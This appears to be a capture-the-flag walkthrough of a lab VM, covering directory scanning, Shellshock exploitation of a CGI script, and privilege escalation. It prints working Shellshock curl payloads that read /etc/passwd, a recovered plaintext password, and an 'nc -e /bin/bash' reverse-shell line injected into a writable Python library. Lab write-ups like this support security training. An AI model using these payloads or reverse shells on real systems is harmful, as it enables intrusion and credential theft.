Scanning the target with nmap –A –T4 –p- 192.168.1.2 –vv
Now on port 80 we’re going to use dirsearch as dirsearch -u http://192.168.1.2/ -w /usr/share/dirb/wordlist/big.txt -e txt,php and we came to find several directories:
/gate
/cerberus/
tartarus/
/hermes
research
Inside /gate/Cerberus/tartarus using curl –v:
So maybe im in the wrong direction, so let’s try the cgi-bin and server-status directories but using gobuster:
gobuster dir -u http://192.168.1.2/cgi-bin -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
Now we found the underworld:
Ok the page is about uptime display:
Ok i searched google and it’s a shellshock code with bash CGI script we can use curl -v http://192.168.1.2/cgi-bin/underworld -H “custom:() { ignored; }; /usr/bin/id”
It worked, let’s tweak the code a bit curl -v http://192.168.1.2/cgi-bin/underworld -H “custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd “
So far its working we can now get a shell using CGI apache script using metasploit:
Using LinEnum.sh script i found a tcpdump file we can take advantage of using tcpdump –D
After sometime transfer the file output.pcap to your machine and read it as tcpdump -qns 0 -A -r output.pcap
We got user hades and password PTpZTfU4vxgzvRBE now we login using ssh service
Got nothing, well i used pspy32 tool to see what’s going on and i found this:
Viewing the file ftpclient.py
Ok the file ftplip is in the directory /usr/lib/python2.7 and the file is writable:
We can add our line to the file:
os.system(“nc -e /bin/bash 192.168.1.13 4444”)
And now we wait for a bit and we will get a shell back to our listening port nc –nlvp 4444
